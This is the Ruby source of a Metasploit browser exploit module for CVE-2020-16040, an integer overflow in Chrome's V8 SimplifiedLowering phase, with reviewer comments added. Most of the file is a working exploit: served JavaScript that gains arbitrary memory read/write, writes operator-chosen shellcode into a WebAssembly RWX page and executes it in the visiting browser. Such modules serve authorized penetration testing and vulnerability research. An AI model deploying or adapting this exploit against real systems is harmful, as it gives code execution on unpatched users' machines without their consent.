Path: blob/master/modules/exploits/multi/browser/chrome_simplifiedlowering_overflow.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Browser exploit module for CVE-2020-16040 (V8 SimplifiedLowering integer overflow).
#
# The module is a plain HTTP server: every request for the module URI is answered
# with one HTML page (built in on_request_uri) carrying the JavaScript exploit and
# the encoded payload as a byte-array literal. Nothing in the module branches on
# the selected target; the three targets differ only in the payload platform.
class MetasploitModule < Msf::Exploit::Remote
  # Manual: the script depends on the JIT behaviour of one specific Chrome build,
  # and the payload only works when the browser runs with --no-sandbox (see Description).
  Rank = ManualRanking

  # NOTE(review): nothing in this module calls a Post::File helper; this mixin
  # looks unused — confirm against the full module before removing it.
  include Msf::Post::File
  include Msf::Exploit::Remote::HttpServer

  # Module metadata.
  #
  # 'Space' limits the encoded payload to 4096 bytes; the payload is rendered
  # into the served page as a JavaScript Uint8Array literal (see on_request_uri).
  #
  # @param info [Hash] module info merged via update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        # NOTE(review): 'SimplfiedLowering' is a typo (the Description below spells
        # it SimplifiedLowering); this string is the user-visible module name.
        'Name' => 'Google Chrome versions before 87.0.4280.88 integer overflow during SimplfiedLowering phase',
        'Description' => %q{
          This module exploits an issue in Google Chrome versions before 87.0.4280.88 (64 bit).
          The exploit makes use of an integer overflow in the SimplifiedLowering phase in turbofan.
          It is used along with a type hardening bypass using ArrayPrototypeShift to create a JSArray with a length of -1.
          This is abused to gain arbitrary read/write into the isolate region.
          Then an ArrayBuffer can be used to achieve absolute arbitrary read/write.
          The exploit then uses WebAssembly in order to allocate a region of RWX memory, which is then replaced with the payload shellcode.
          The payload is executed within the sandboxed renderer process, the browser must be run with the --no-sandbox option for the payload to work correctly.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'Rajvardhan Agarwal (r4j)', # exploit
        ],
        'References' => [
          ['CVE', '2020-16040'],
          ['URL', 'https://chromium-review.googlesource.com/c/v8/v8/+/2557498'],
          ['URL', 'https://github.com/r4j0x00/exploits/tree/master/CVE-2020-16040'],
          ['URL', 'https://faraz.faith/2021-01-07-cve-2020-16040-analysis/'],
          ['URL', 'https://bugs.chromium.org/p/chromium/issues/detail?id=1150649'],
        ],
        'Arch' => [ ARCH_X64 ],
        'DefaultTarget' => 0,
        'Payload' => {
          'Space' => 4096
        },
        # IOC_IN_LOGS: the request URI and User-Agent are printed server-side, and
        # the served page (wasm byte array + script) is a recognisable artifact on
        # the wire. CRASH_SERVICE_RESTARTS: a failed attempt is retried through
        # location.reload() from the script's catch handler, so an unsuccessful run
        # shows up as repeated requests for the same URI from the same client.
        'Notes' => {
          'Reliability' => [ REPEATABLE_SESSION ],
          'SideEffects' => [ IOC_IN_LOGS ],
          'Stability' => [CRASH_SERVICE_RESTARTS]
        },
        # All three targets serve the identical page; only the payload platform differs.
        'Targets' => [
          ['Linux - Google Chrome 87.0.4280.66 (64 bit)', { 'Platform' => 'linux' }],
          ['Windows 10 - Google Chrome 87.0.4280.66 (64 bit)', { 'Platform' => 'win' }],
          ['macOS - Google Chrome 87.0.4280.66 (64 bit)', { 'Platform' => 'osx' }],
        ],
        'DisclosureDate' => '2020-11-19'
      )
    )
  end

  # Serves the exploit page to a connecting browser.
  #
  # The page is the same for every request and every target. The only dynamic
  # part is `#{shellcode}`: the encoded payload rendered by Rex::Text.to_num as a
  # comma-separated byte list and interpolated into the JavaScript `shellcode`
  # Uint8Array. Everything else in the JS heredoc is a runtime string sent
  # verbatim, so it must not be edited or reformatted; the 0x3000 calls to
  # foo(true) before the single foo(false) call are presumably deliberate and
  # should not be reordered.
  #
  # @param cli [Rex::Socket] client socket handed over by HttpServer
  # @param request [Rex::Proto::Http::Request] incoming request; its uri and
  #   User-Agent are logged with print_status
  # @return [void] the response is written with send_response
  def on_request_uri(cli, request)
    print_status("Sending #{request.uri} to #{request['User-Agent']}")
    # to_num output may contain CRLF line breaks; strip them so the array
    # literal below stays on a single line.
    shellcode = Rex::Text.to_num(payload.encoded).gsub(/\r\n/, '')
    # Static exploit script; only #{shellcode} is interpolated.
    jscript = <<~JS
      var wasm_code = new Uint8Array([0,97,115,109,1,0,0,0,1,133,128,128,128,0,1,96,0,1,127,3,130,128,128,128,0,1,0,4,132,128,128,128,0,1,112,0,0,5,131,128,128,128,0,1,0,1,6,129,128,128,128,0,0,7,145,128,128,128,0,2,6,109,101,109,111,114,121,2,0,4,109,97,105,110,0,0,10,138,128,128,128,0,1,132,128,128,128,0,0,65,42,11])
      var wasm_mod = new WebAssembly.Module(wasm_code);
      var wasm_instance = new WebAssembly.Instance(wasm_mod);
      var wasm_func = wasm_instance.exports.main;

      var buf = new ArrayBuffer(8);
      var f64_buf = new Float64Array(buf);
      var u64_buf = new Uint32Array(buf);
      var shellcode = new Uint8Array([#{shellcode}]);
      var shellbuf = new ArrayBuffer(shellcode.length);
      var dataview = new DataView(shellbuf);

      function ftoi(val) {
        f64_buf[0] = val;
        return BigInt(u64_buf[0]) + (BigInt(u64_buf[1]) << 32n);
      }

      function itof(val) {
        u64_buf[0] = Number(val & 0xffffffffn);
        u64_buf[1] = Number(val >> 32n);
        return f64_buf[0];
      }

      function foo(a) {
        var y = 0x7fffffff;

        if (a == NaN) y = NaN;
        if (a) y = -1;

        let z = y + 1;
        z >>= 31;
        z = 0x80000000 - Math.sign(z|1);

        if(a) z = 0;

        var arr = new Array(0-Math.sign(z));
        arr.shift();
        var cor = [1.1, 1.2, 1.3];

        return [arr, cor];
      }

      try {
        for(var i=0;i<0x3000;++i)
          foo(true);

        var x = foo(false);
      } catch (e) {
        location.reload();
      }
      var arr = x[0];
      var cor = x[1];

      const idx = 6;
      arr[idx+10] = 0x4242;

      function addrof(k) {
        arr[idx+1] = k;
        return ftoi(cor[0]) & 0xffffffffn;
      }

      function fakeobj(k) {
        cor[0] = itof(k);
        return arr[idx+1];
      }

      var float_array_map = ftoi(cor[3]);

      var arr2 = [itof(float_array_map), 1.2, 2.3, 3.4];
      var fake = fakeobj(addrof(arr2) + 0x20n);

      function arbread(addr) {
        if (addr % 2n == 0) {
          addr += 1n;
        }
        arr2[1] = itof((2n << 32n) + addr - 8n);
        return ftoi(fake[0]);
      }

      function arbwrite(addr, val) {
        if (addr % 2n == 0) {
          addr += 1n;
        }
        arr2[1] = itof((2n << 32n) + addr - 8n);
        fake[0] = itof(BigInt(val));
      }

      function copy_shellcode(addr, shellcode) {
        let buf_addr = addrof(shellbuf);
        let backing_store_addr = buf_addr + 0x14n;
        arbwrite(backing_store_addr, addr);

        for (let i = 0; i < shellcode.length; i++) {
          dataview.setUint8(i, shellcode[i]);
        }
      }

      var rwx_page_addr = arbread(addrof(wasm_instance) + 0x68n);
      copy_shellcode(rwx_page_addr, shellcode);
      wasm_func();
    JS

    # Minimal page wrapping the script.
    html = <<~HTML
      <html>
      <head>
      <script>
      #{jscript}
      </script>
      </head>
      <body>
      </body>
      </html>
    HTML
    # Caching is disabled: a reload issued by the script's catch handler
    # re-requests the page from this module instead of the browser cache.
    send_response(cli, html, { 'Content-Type' => 'text/html', 'Cache-Control' => 'no-cache, no-store, must-revalidate', 'Pragma' => 'no-cache', 'Expires' => '0' })
  end

end